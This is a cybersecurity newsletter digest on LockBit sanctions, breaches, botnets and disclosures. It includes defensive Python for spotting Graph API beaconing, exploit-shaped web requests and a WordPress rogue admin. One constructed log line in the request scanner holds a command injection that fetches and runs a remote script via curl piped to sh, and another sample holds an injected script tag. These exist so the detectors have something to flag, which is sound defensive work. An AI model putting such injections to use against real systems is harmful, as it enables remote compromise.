
Invaders Drop News: Senior Russian Leader of Notorious Ransomware Gang LockBit Sanctioned by US, UK, and Australia

More News:

  • Data Breaches: WebDetetive (OwnSpy), a Brazilian spyware maker, has been breached for the second time. Online health store Piping Rock has also suffered a massive data breach, exposing the information of 2.1 million customers.

  • Hacking Incidents: Russian hackers have hijacked a Latvian TV station to broadcast the Kremlin's Victory Day military parade.

  • Cyber Espionage: Indonesian government is using spyware to surveil its own citizens.

  • Cybercrime: Seven men have been charged in the US for allegedly planting card skimmers at gas stations. A 21-year-old man has pleaded guilty to hacking-related charges for attacking DraftKings Fantasy Sports Site.

  • Malware: A new variant of the Mirai botnet targets Ivanti Pulse Secure VPNs with two recently patched vulnerabilities. A surge of JavaScript-based malware has been found on WordPress sites with vulnerable versions of the LiteSpeed Cache plugin.

  • Advanced Cyber Threats: Russian cyberspies have launched a spear-phishing campaign against the Polish government. North Korean hackers are using fake job interviews to infect developers with malware.

  • Vulnerability Disclosure: A new side-channel attack called Pathfinder targets the conditional branch predictor (CBP) mechanism of Intel CPUs. Xiaomi apps have been found to expose devices to root access and data theft.

Get the latest cyber news with the Invaders Drop news podcast, brought to you by Invaders Cybersecurity! Listen to our easy-to-understand audio updates: just search for "Invaders Drop news" in your podcast app, subscribe, and stay in the loop!

In a significant development, law enforcement agencies have unmasked the man behind the infamous LockBit ransomware gang. The US, UK, and Australia have imposed sanctions on Dmitry Khoroshev, a Russian national identified as a senior leader of the group.

LockBit has been a prolific ransomware operation, extorting hundreds of millions of dollars from victims worldwide. It ran a ransomware-as-a-service model: the core group licensed its malware to affiliates, who carried out the attacks and shared the ransom proceeds with LockBit.

The sanctions were announced alongside the unsealing by the US Justice Department of a 26-count indictment against Khoroshev, a major blow to the criminal organization. The charges include conspiracy to commit fraud, extortion, and related computer-intrusion offences, and carry a combined maximum penalty of 185 years in prison.

The US State Department has also offered a reward of up to $10 million for information leading to Khoroshev's arrest or conviction, underscoring the priority placed on dismantling this formidable threat.

Despite the pressure, the operator of the LockBitSupp persona, the gang's public face, has denied being Khoroshev. He has expressed a preference for a Russian prison and has even invited others to join his affiliate program, remaining defiant in the face of the legal actions taken against him.

The unmasking of Dmitry Khoroshev and the subsequent sanctions and legal actions represent a significant step in the ongoing global effort to combat the growing threat of ransomware. As law enforcement agencies continue to track and disrupt the activities of LockBit and other such criminal organizations, the hope is that these measures will serve as a deterrent and protect individuals and businesses from the devastating impact of these cyberattacks.

🚨 Dell Warns Customers of Security Breach, Exposes 49 Million Personal Details: Tech giant Dell is emailing customers to notify them of a security breach. The company says a threat actor gained access to one of its systems and stole customer data such as names, physical addresses, and Dell hardware and order information; Dell says no financial data, email addresses, or phone numbers were involved. Dell is disclosing the breach ten days after a threat actor began selling a batch containing the personal details of 49 million Dell customers.

🚨 Brazilian Spyware Maker WebDetetive Breached Again: Hackers have breached Brazilian spyware maker WebDetetive (OwnSpy) for the second time, following a first intrusion in August of last year. The breach exposed sensitive information, including customer data, financial records, and source code. The incident underscores the risk spyware vendors pose to their own customers and to the people they monitor: the data they collect is only as safe as their own security, and this one has now failed twice.

🚨 Russian Hackers Broadcast Kremlin's Victory Day Military Parade on Balticom: Russian hackers hijacked Latvian TV station Balticom to broadcast the Kremlin's May 9 Victory Day military parade. Balticom says the hack affected a content partner in Bulgaria and that its core network was not breached. This is the second time in a month that Russian hackers have hijacked Latvian TV, after a similar incident at TV station Tet in mid-April. The incident shows how a broadcaster's output can be hijacked for propaganda through a third-party content supplier even when its own network holds.

🚨 Dutch Crypto Exchange Notifies Users of Security Incident: Dutch cryptocurrency exchange Bitvavo has notified users of a security breach in which an unauthorized party gained access to the company's systems, potentially compromising sensitive data. Depending on what was reached, the incident could affect users' personal information, trading history, and wallet balances. Bitvavo has temporarily suspended trading operations while it investigates and mitigates the breach.

🚨 Online Health Store Piping Rock Hit with Massive Data Breach: Online health products store Piping Rock has suffered a massive data breach, with the details of 2.1 million customers dumped on a hacking forum. The leaked data includes sensitive personal information: names, addresses, phone numbers, and email addresses.

🚨 Chinese Hackers Hijack 800 Solar Power Monitoring Devices in Japan: A Chinese hacking group has hijacked more than 800 solar power generation monitoring devices across Japan. The incident took place at the start of May and targeted devices made by Japanese company CONTEC. The hacked devices were used as proxies to conceal the hackers' identities while making illegal money transfers. This highlights the risk of internet-exposed IoT and operational-technology devices and the importance of patching and isolating them.

Cybersecurity Firm Avast Fined €14M for Violating GDPR Rules: The Czech data protection agency has fined cybersecurity firm Avast €14 million for violating EU General Data Protection Regulation (GDPR) rules. The agency says Avast misled customers on multiple counts about how it handled their personal data. Avast told customers it was only collecting data for statistical analysis but secretly sold it to third parties, and it falsely claimed the data would be anonymized. This is Avast's second fine for the same infringement; it was also fined $16.5 million in the US earlier this year.

Policy & Governance Perspectives

📌 Indonesian Govt Uses Spyware to Surveil Its Own Citizens: An Amnesty International investigation found that the Indonesian government bought and is using surveillance tools from commercial spyware vendors, including NSO Group, Candiru, FinFisher, Wintego, and Intellexa, to monitor and surveil its own citizens. This raises serious concerns about privacy, human rights, and the rule of law.

📌 First-of-its-kind Report Shows the US's Cybersecurity Stance: The White House has published the first edition of its Cybersecurity Posture Report, a document that describes the US approach to cybersecurity, its current capabilities, policies, and strategies, and the threats and challenges facing the country.

📌 US Organizations Received Security Alerts but Patched Devices Half the Time: The US Cybersecurity and Infrastructure Security Agency (CISA) sent 1,754 notifications about unpatched devices to organizations last year, but only 49% of the vulnerable systems were patched. CISA set up the Ransomware Vulnerability Warning Pilot in March last year to warn companies about unpatched, internet-facing devices of the kinds commonly exploited by ransomware gangs.

🔍 US Charges Seven Men for Allegedly Planting Card Skimmers at Gas Stations: The US has charged seven men in connection with their alleged roles in a group that planted card skimmers at gas station pumps. All seven suspects are from Florida. The suspects are accused of installing skimmers at gas station pumps in various states, including Florida, Georgia, and Texas. The scheme allegedly allowed them to steal credit card information and make unauthorized purchases.

🔍 Man Pleads Guilty to Hacking DraftKings Fantasy Sports Site: A 21-year-old from Memphis, Tennessee, has pleaded guilty to hacking-related charges, according to US prosecutors. Kamerin Stokes was part of a three-man group that launched credential-stuffing attacks against DraftKings in November 2022. Stokes operated under the handle TheMFNPlug and ran an online shop where his co-conspirators sold the hijacked accounts. Authorities charged Stokes in January this year, weeks after the gang's leader was sentenced to 18 months in prison.

🔍 Symantec Team Warns of Microsoft Graph API Abuse: Broadcom's Symantec team has published an analysis of how a growing number of threat actors abuse the Microsoft Graph API, hiding command-and-control traffic inside legitimate Microsoft cloud services such as OneDrive. The technique is on the rise and likely to grow in popularity because the traffic blends in with normal Microsoft 365 activity, and a compromised account or token also gives attackers a path to mailboxes, files, and other tenant data through the same API.
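One way to hunt for this in proxy or HTTP logs, as an added example that is not Symantec's code: group Graph API requests per client and user agent, then flag groups whose client is not a browser or Office application, or whose requests arrive at clock-like intervals. The record format (Zeek-style JSON lines with ts, src, host, uri and user_agent), the user-agent allowlist, the thresholds and the sample log lines are all assumptions constructed for the example.

```python
"""Hunt for Microsoft Graph API abuse in HTTP proxy logs.

Added example, not Symantec's code. Assumes newline-delimited JSON records
with fields ts (epoch seconds), src (client IP), host, uri and user_agent,
the shape of a Zeek http.log written in JSON mode. The allowlist and
thresholds are assumptions to tune per environment.
"""
import json
import statistics
from collections import defaultdict

GRAPH_HOSTS = {"graph.microsoft.com"}
# Assumed allowlist: user-agent prefixes that legitimately call Graph here.
EXPECTED_UA_PREFIXES = ("Mozilla/", "Microsoft Office", "Outlook", "OneDrive", "Teams")
MIN_REQUESTS = 6    # fewer than this is not enough to call something a beacon
MAX_JITTER = 0.15   # stdev/mean of inter-request gaps; lower means more clock-like


def _rec(ts, src, uri, ua):
    """Build one constructed log record as a JSON line."""
    return json.dumps({"ts": ts, "src": src, "host": "graph.microsoft.com",
                       "uri": uri, "user_agent": ua})


# Constructed sample log: 10.0.0.5 polls a file under a OneDrive path every ~60 s
# with a scripting user agent; 10.0.0.7 is a browser reading mail at irregular times.
_A_TS = [1715000000, 1715000060, 1715000121, 1715000180, 1715000240, 1715000300, 1715000361, 1715000420]
_B_TS = [1715000010, 1715000500, 1715000700]
SAMPLE_LOG = "\n".join(
    [_rec(t, "10.0.0.5", "/v1.0/me/drive/root:/tasks.txt:/content", "python-requests/2.31.0") for t in _A_TS]
    + [_rec(t, "10.0.0.7", "/v1.0/me/messages?$top=10", "Mozilla/5.0 (Windows NT 10.0) Edg/124.0") for t in _B_TS]
)


def load_records(text):
    """Parse JSON lines into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def beacon_jitter(timestamps):
    """Coefficient of variation of the gaps between requests; None if too few."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    mean = statistics.mean(gaps)
    return None if mean == 0 else statistics.pstdev(gaps) / mean


def find_graph_abuse(records):
    """Group Graph traffic per (client, user agent) and flag suspicious groups."""
    groups = defaultdict(list)
    for r in records:
        if r.get("host") in GRAPH_HOSTS:
            groups[(r["src"], r.get("user_agent", ""))].append(r)
    findings = []
    for (src, ua), rs in groups.items():
        reasons = []
        if not ua.startswith(EXPECTED_UA_PREFIXES):
            reasons.append("unexpected user agent")
        jitter = beacon_jitter([r["ts"] for r in rs])
        if len(rs) >= MIN_REQUESTS and jitter is not None and jitter <= MAX_JITTER:
            reasons.append(f"periodic beaconing ({len(rs)} requests, jitter {jitter:.2f})")
        if reasons:
            findings.append({"src": src, "user_agent": ua,
                             "uris": sorted({r["uri"] for r in rs}), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_graph_abuse(load_records(SAMPLE_LOG)):
        print(f["src"], f["user_agent"], "->", "; ".join(f["reasons"]))
```

On the constructed sample only the scripted client is reported, for both reasons. The user-agent check alone is noisy in environments with custom automation, and the beacon check alone misses low-volume or randomly jittered C2, so the two are combined and the URIs are returned so an analyst can see which drive item or mailbox the client keeps touching.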

Malware technical reports

🔍 Lua Bytecode Hides Redline Infostealer Versions: ANY.RUN has analyzed recent versions of the Redline infostealer that ship their logic as compiled Lua bytecode rather than readable code. This is an effective way to stay under the radar, because bytecode is harder to inspect and to write signatures for than plain source or a conventional binary payload.

🔍 Mirai Botnet Variant Targets Ivanti Pulse Secure VPNs: Juniper Threat Labs has discovered a new variant of the Mirai botnet that targets Ivanti Connect Secure (formerly Pulse Secure) VPN appliances through two recently patched vulnerabilities, CVE-2023-46805 (an authentication bypass) and CVE-2024-21887 (a command injection), which Ivanti fixed in early 2024. Chained together, they let an unauthenticated attacker run commands on the appliance, which the botnet uses to fetch and run its payload. Like other Mirai descendants, the botnet can be used to launch DDoS attacks and as a foothold for further malicious activity.
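The public exploit chain for these two CVEs combined a path-traversal authentication bypass with a command-injection parameter, so a responder with only web-server access logs can still spot attempts. The scanner below is an added example, not Juniper's code or an Ivanti signature: it parses combined-format log lines, URL-decodes each path twice (to catch double-encoded traversal), and flags any path segment of ".." or any shell metacharacter in the route. The sample lines are constructed to that shape, not captured traffic.

```python
"""Flag exploit-shaped requests (path traversal plus shell metacharacters)
in a web-server access log.

Added example, not Juniper's code or an Ivanti signature. The log lines
are constructed to resemble the public exploit chain, not captured traffic.
"""
import re
from urllib.parse import unquote

# Apache/nginx combined log format: client, identd, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
    r'(?:.*"(?P<ua>[^"]*)")?$'
)
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")   # a '..' path segment
SHELL_META = re.compile(r"[;|`$&]")              # characters a shell treats specially

# Constructed sample: a normal login page load, a traversal + command injection
# attempt, a double-encoded traversal probe that was rejected, and a benign
# request whose query string happens to contain a ';'.
SAMPLE_LOG = """\
203.0.113.9 - - [07/May/2024:10:00:01 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.23 - - [07/May/2024:10:00:07 +0000] "GET /api/v1/totp/user-backup-code/../../api/v1/license/keys-status/;curl%20http://198.51.100.23/x.sh|sh; HTTP/1.1" 200 2310 "-" "curl/7.88.1"
198.51.100.23 - - [07/May/2024:10:00:09 +0000] "GET /api/v1/totp/user-backup-code/%252e%252e/%252e%252e/api/v1/system/status HTTP/1.1" 403 199 "-" "python-requests/2.31.0"
203.0.113.9 - - [07/May/2024:10:00:15 +0000] "GET /api/v1/users?filter=name;desc HTTP/1.1" 200 880 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""


def parse_line(line):
    """Return the named groups of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Return the list of reasons a request path looks like an exploit attempt."""
    decoded = unquote(unquote(path))   # decode twice to catch %252e-style double encoding
    route = decoded.split("?", 1)[0]   # query strings legitimately carry ';' and '&'
    reasons = []
    if TRAVERSAL.search(route):
        reasons.append("path traversal")
    if SHELL_META.search(route):
        reasons.append("shell metacharacters in path")
    return reasons


def scan(log_text):
    """Scan a whole log and return one hit per suspicious request, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        reasons = classify(rec["path"])
        if reasons:
            hits.append({"src": rec["src"], "ts": rec["ts"], "status": rec["status"],
                         "path": rec["path"], "ua": rec["ua"] or "-", "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(h["src"], h["status"], h["path"], "->", ", ".join(h["reasons"]))
```

Note that the rejected (403) probe is still reported: a failed attempt from an address that then succeeds seconds later is exactly the sequence worth seeing, and the status code is returned so the two cases can be separated afterwards. The scanner is deliberately pattern-based rather than tied to one product's routes, so it also catches the same shape of request against other appliances.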

🔍 WPScan Reports Surge of JavaScript Malware on WordPress Sites: The WPScan team has published a report on a JavaScript-based malware strain it keeps finding on WordPress sites. The campaign can be recognized by the same admin user planted on every hacked site, "wpsupp-user". The attacker is most likely exploiting sites that run older versions of the LiteSpeed Cache plugin through a stored cross-site scripting bug (CVE-2023-40000) that was patched in late 2023; sites that never updated the plugin remain exposed.
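The two indicators above, a planted administrator and script tags stored in the database, are both answerable with SQL. The audit below is an added example, not WPScan's code: it runs the queries a responder would run against a site's MySQL database, here against an in-memory SQLite copy of the three relevant tables so it works offline. The rows are constructed; the option name is the one LiteSpeed Cache uses for admin notices and is assumed here as the injection point, and the script URL is a placeholder, not the campaign's real domain.

```python
"""Audit a WordPress database for a rogue administrator and injected script tags.

Added example, not WPScan's code. Runs against an in-memory SQLite copy of
the wp_users, wp_usermeta and wp_options tables with constructed rows; the
same two queries run unchanged against MySQL (adjust the table prefix).
"""
import sqlite3

ROGUE_ADMIN = "wpsupp-user"   # the account name reported by WPScan

SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
"""

# Constructed sample rows: one legitimate admin, the planted admin, and a
# LiteSpeed Cache option (assumed injection point) whose serialized value
# carries a script tag pointing at a placeholder domain.
SAMPLE_ROWS = """
INSERT INTO wp_users VALUES (1, 'siteowner', 'owner@example.com', '2022-03-01 09:00:00');
INSERT INTO wp_users VALUES (7, 'wpsupp-user', 'wpsupp@example.com', '2024-05-03 02:14:51');
INSERT INTO wp_usermeta VALUES (1, 1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
INSERT INTO wp_usermeta VALUES (2, 7, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
INSERT INTO wp_options VALUES (1, 'blogname', 'Example Site');
INSERT INTO wp_options VALUES (2, 'litespeed.admin_display.messages', 'a:1:{i:0;s:60:"<script src="https://example.invalid/f.js"></script>";}');
"""

# Administrators are users whose serialized capabilities include the administrator role.
ADMIN_QUERY = """
SELECT u.user_login, u.user_registered
FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%'
ORDER BY u.ID
"""
# Any option whose value carries a <script tag is suspect; legitimate options rarely do.
INJECTED_OPTION_QUERY = """
SELECT option_name FROM wp_options
WHERE LOWER(option_value) LIKE '%<script%' ORDER BY option_id
"""


def build_db(rows_sql=SAMPLE_ROWS):
    """Create the in-memory database and load the given INSERT statements."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA + rows_sql)
    return conn


def list_admins(conn):
    """Return (login, registered) for every administrator account."""
    return [(login, registered) for login, registered in conn.execute(ADMIN_QUERY)]


def find_injected_options(conn):
    """Return the names of options whose values contain a script tag."""
    return [name for (name,) in conn.execute(INJECTED_OPTION_QUERY)]


def audit(conn, expected_admins):
    """Report admins that are either the known IOC or not on the expected list,
    plus options carrying injected script."""
    rogue = [login for login, _ in list_admins(conn)
             if login == ROGUE_ADMIN or login not in expected_admins]
    return {"rogue_admins": rogue, "injected_options": find_injected_options(conn)}


if __name__ == "__main__":
    print(audit(build_db(), expected_admins={"siteowner"}))
```

The admin check compares against a list of expected accounts rather than only the published name, because the attacker's next campaign will pick a different login; the registration timestamp is returned so a newly created admin stands out. On a live site, `wp user list --role=administrator` gives the same first list through WP-CLI, and the option query should be widened to wp_posts content once the option scan turns up a hit.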

Advanced Cyber Threats

👉🏻 Russian Cyberspies Launch Spear-Phishing Campaign Against Polish Government: Polish cybersecurity agencies (CERT-PL and NASK) have attributed a spear-phishing campaign against the government to APT28, a Russian cyber-espionage group linked to the country's military intelligence unit. The spear-phishing campaign comes after Czechia, Germany, and Poland called out Russia's cyber-espionage operations in Europe. This latest campaign follows a similar pattern, with Russian cyberspies targeting government officials and entities.

👉🏻 Social Engineering Campaign Uses Fake Job Interviews to Infect Developers: North Korean hackers are behind a social engineering campaign targeting software developers with fake job interviews. Developers invited to interviews are asked to take tests and perform tasks that get them infected with malware. Securonix says the final payload is a Python-based remote access trojan that can be used to collect data from their systems. This is a clever and targeted attack aimed at gaining access to sensitive data and systems.

Vulnerability Disclosure Digest

🔔 Iranian Influence Operations Group, Emerald Divide, Targets Israel with Cyberattacks: Recorded Future has warned of an Iranian influence operations group, Emerald Divide (Storm-1364), that has been using the recent Israel-Hamas conflict to manipulate Israeli society and diminish trust in their own government. The group has ramped up operations after the Hamas October 7 attack, targeting Israeli public officials with cybersecurity intrusions designed to collect personal data and then doxing them on social media.

🔔 Pathfinder CPU Attack Targets Intel Processors: Academics have disclosed a new side-channel attack against the speculative execution machinery of modern Intel processors. Named Pathfinder, it targets the conditional branch predictor (CBP) and can recover the processor's branch history, which leaks a victim program's control flow and, with it, secrets such as cryptographic keys. Pathfinder is a more refined and efficient version of earlier attacks on the same mechanism, such as Spectre and BranchScope.

🔔 Xiaomi Apps Expose Devices to Root Access and Data Theft: Security firm Oversecured has found 20 vulnerabilities across several Xiaomi apps that could allow root access to the device, theft of user data, and other malicious activity. Xiaomi fixed all issues within days of receiving the report, but the find is a reminder that pre-installed vendor apps carry the same risk as any other privileged code on the device.

Industry Cyber Solutions

🔔 Thoma Bravo Acquires DarkTrace for $5.32 Billion: Private equity firm Thoma Bravo has agreed to acquire UK cybersecurity company Darktrace, which sells AI-based threat detection and response to companies and governments worldwide, for $5.32 billion. The deal is another sign of the value investors now place on cybersecurity and on detection products in particular.

🔔 Congratulations to CrowdStrike on Naming a Ransomware Group...PunkSpider: CrowdStrike has named a ransomware group "PunkSpider", a name already used by a well-known web vulnerability scanner. Reusing an established tool's name for a threat actor is a poor choice that will cause confusion whenever the two show up in the same search results or report.

🔔 Security Firm Intigriti Launches Tool to Find, Detect and Resolve Common Security Misconfigurations: Intigriti has open-sourced Misconfig Mapper, a tool to find, detect, and resolve common security misconfigurations in popular services, technologies, and SaaS products. It supports the likes of Jira, Drupal, GitLab, Jenkins, Laravel, GraphQL, and others, making it a handy resource for security testers and researchers.

Stay informed about the latest cybersecurity threats and take steps to protect your personal information and online activities. Subscribe to our newsletter and get the scoop on the most important stories, straight to your inbox.
